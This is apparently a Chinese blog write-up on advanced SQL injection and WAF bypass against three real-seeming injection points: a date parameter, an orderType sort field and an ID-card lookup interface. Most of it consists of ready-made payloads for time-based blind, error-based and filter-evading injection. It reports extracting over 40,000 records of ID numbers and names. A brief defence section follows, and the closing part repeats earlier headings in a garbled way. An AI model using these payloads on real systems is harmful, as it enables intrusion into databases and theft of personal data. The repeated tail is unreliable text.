SQL注入高级技巧与绕过方法详解<\/h1>

一、SQL注入基础回顾<\/h2>
SQL注入是通过将恶意SQL代码插入到应用的输入参数中，从而在后台数据库执行非预期操作的攻击方式。本文介绍了几种高级SQL注入技巧和WAF绕过方法。<\/p>

二、第一处注入：日期格式注入与时间盲注<\/h2>

注入点分析<\/h3>

注入点位于日期参数：date_format('2025-06-19 00:00:00','%Y-%m-%d %H:%M:%S')<\/code><\/li>

单引号测试：添加单引号导致报错，确认存在注入漏洞<\/li>
<\/ul>
初始尝试<\/h3>

尝试闭合：2025-06-19 00:00:00')#<\/code><\/li>
尝试报错注入：2025-06-19 00:00:00') and extractvalue(1,concat(0x0a,(select user()),0x0a))#<\/code><\/li>
完整参数闭合：2025-06-19 00:00:00','%Y-%m-%d %H:%M:%S') and extractvalue(1,concat(0x0a,(select user()),0x0a))#<\/code><\/li>
<\/ol>
问题发现<\/h3>

网站返回的是框架自定义错误，而非数据库原生错误<\/li>
报错注入无法获取有效信息<\/li>
<\/ul>
时间盲注解决方案<\/h3>

常规时间盲注失败：if(ascii(substr(user(),1,1))>1,sleep(6),0)<\/code><\/li>
原因：WHERE条件可能为假，导致后续语句不执行<\/li>
<\/ol>
子查询时间盲注<\/h3>
select<\/span> count<\/span>(1<\/span>) from<\/span> (
<\/span><\/span>    select<\/span> username from<\/span> admin<\/span> as<\/span> t join<\/span> news as<\/span> u 
<\/span><\/span>    where<\/span> 1<\/span>=<\/span>2<\/span> and<\/span> (
<\/span><\/span>        select<\/span> 0<\/span> from<\/span> (
<\/span><\/span>            select<\/span> if<\/span>(ascii(substr(user<\/span>(),1<\/span>,1<\/span>))><\/span>1<\/span>,sleep(6<\/span>),1<\/span>)
<\/span><\/span>        )x
<\/span><\/span>    )
<\/span><\/span>)TOTAL#<\/span>
<\/span><\/span><\/code><\/pre>关键点解析<\/strong>：<\/p>

子查询优先执行，不受外层条件真假影响<\/li>
if(ascii(substr(user(),1,1))>1,sleep(6),1)<\/code> 是核心盲注逻辑<\/li>
select 0 from (...)x<\/code> 是子查询包装技巧<\/li>
<\/ul>
最终Payload<\/h3>
2025-06-19 00:00:00','%Y-%m-%d %H:%M:%S') and (select 0 from (select if(ascii(substr(user(),1,1))>1,sleep(6),1))x))TOTAL#
<\/code><\/pre>
三、第二处注入：严格过滤下的绕过技巧<\/h2>
注入环境<\/h3>

注入点：orderType参数<\/li>
过滤严格：常见函数和绕过方法基本被过滤<\/li>
<\/ul>
绕过技巧组合<\/h3>

权限绕过<\/strong>：直接修改返回包(false改为true)<\/li>
函数绕过<\/strong>：

使用Y(point(56.7,53.34))<\/code>作为恒真条件<\/li>
使用benchmark()<\/code>替代sleep()<\/code>进行时间延迟<\/li>
<\/ul>
<\/li>
空格绕过<\/strong>：使用\/**\/<\/code>替代空格<\/li>
内联注释绕过<\/strong>：

\/*!55555*\/<\/code>用于绕过特定函数检测<\/li>
超大版本号确保始终执行<\/li>
<\/ul>
<\/li>
字符串处理函数组合<\/strong>：

right(left(user(),1),1)<\/code>增加复杂度<\/li>
<\/ul>
<\/li>
<\/ol>
完整Payload分析<\/h3>
orderType=1%20or%20Y(point(56.7,53.34))%20or%20(select\/**\/0\/**\/from\/**\/(select\/**\/if((ascii(right(left(user\/*!55555*\/(),1),1))!=1),(select\/*!55555555555555555*\/benchmark(511111111,1)),1))x)
<\/code><\/pre>
关键组件<\/strong>：<\/p>

Y(point(56.7,53.34))<\/code> - 地理函数作为恒真条件<\/li>
\/*!55555*\/<\/code> - 内联注释绕过user()检测<\/li>
benchmark(511111111,1)<\/code> - 高强度延迟函数<\/li>
子查询结构确保优先执行<\/li>
<\/ol>
四、第三处注入：身份证查询接口注入<\/h2>
注入环境<\/h3>

注入点：tj参数(身份证查询接口)<\/li>
原始逻辑：sfzh='123123' and xm='12331'<\/code><\/li>
<\/ul>
初始测试<\/h3>

闭合构造：tj=sfzh=1#<\/code> → sfzh=1 and (注入语句)#<\/code><\/li>
逻辑运算符绕过：

and<\/code>\/or<\/code>被过滤<\/li>
使用||<\/code>替代：|| 1=1#<\/code>(502错误) vs || 1=2#<\/code>(返回内容)<\/li>
<\/ul>
<\/li>
<\/ol>
报错注入绕过<\/h3>

常见报错函数被过滤：extractvalue()<\/code>, floor()<\/code>, updatexml()<\/code>, exp()<\/code><\/li>
反引号绕过：

extractvalue(1, concat(0x0a, version<\/code>()))#`<\/li>
concat()<\/code>也使用反引号绕过<\/li>
<\/ul>
<\/li>
<\/ol>
权限查询绕过<\/h3>

user()<\/code>被过滤 → 使用current_user<\/code>替代<\/li>
<\/ul>
数据提取技巧<\/h3>

模糊查询：sfzh like '1%'<\/code><\/li>
单引号绕过：使用16进制编码

'2%'<\/code> → 0x3225<\/code><\/li>
<\/ul>
<\/li>
成功获取敏感数据：身份证、姓名、单位、学校等(约4w+条记录)<\/li>
<\/ol>
五、关键技巧总结<\/h2>
1. 时间盲注进阶<\/h3>

子查询优先执行特性<\/li>
不受外层条件真假影响的结构<\/li>
benchmark()<\/code>与sleep()<\/code>的选择<\/li>
<\/ul>
2. 严格过滤绕过<\/h3>

内联注释技巧(\/*!55555*\/<\/code>)<\/li>
非常用函数利用(Y(point())<\/code>)<\/li>
反引号分隔关键字<\/li>
16进制编码绕过引号过滤<\/li>
<\/ul>
3. 报错注入优化<\/h3>

多种报错函数备选方案<\/li>
函数名分隔技巧<\/li>
错误信息提取方法<\/li>
<\/ul>
4. 数据提取策略<\/h3>

模糊查询构造<\/li>
大规模数据分批获取<\/li>
敏感字段定位方法<\/li>
<\/ul>
六、防御建议<\/h2>

对所有输入参数进行严格类型检查和过滤<\/li>
使用参数化查询(prepared statements)<\/li>
最小权限原则，限制数据库账户权限<\/li>
自定义错误信息，避免泄露数据库细节<\/li>
多层面WAF防护，包括但不限于：

常见注入模式识别<\/li>
异常函数调用检测<\/li>
注释和编码变体识别<\/li>
<\/ul>
<\/li>
定期安全审计和渗透测试<\/li>
<\/ol>
通过掌握这些高级注入技巧，安全人员可以更全面地评估系统安全性，同时开发人员也能更好地理解如何构建更安全的应用程序。<\/p>

SQL注入高级技巧与绕过方法详解<\/h1>

一、SQL注入基础回顾<\/h2> SQL注入是通过将恶意SQL代码插入到应用的输入参数中，从而在后台数据库执行非预期操作的攻击方式。本文介绍了几种高级SQL注入技巧和WAF绕过方法。<\/p>

二、第一处注入：日期格式注入与时间盲注<\/h2>

三、第二处注入：严格过滤下的绕过技巧<\/h2>

四、第三处注入：身份证查询接口注入<\/h2>

五、关键技巧总结<\/h2>

一、SQL注入基础回顾<\/h2>
SQL注入是通过将恶意SQL代码插入到应用的输入参数中，从而在后台数据库执行非预期操作的攻击方式。本文介绍了几种高级SQL注入技巧和WAF绕过方法。<\/p>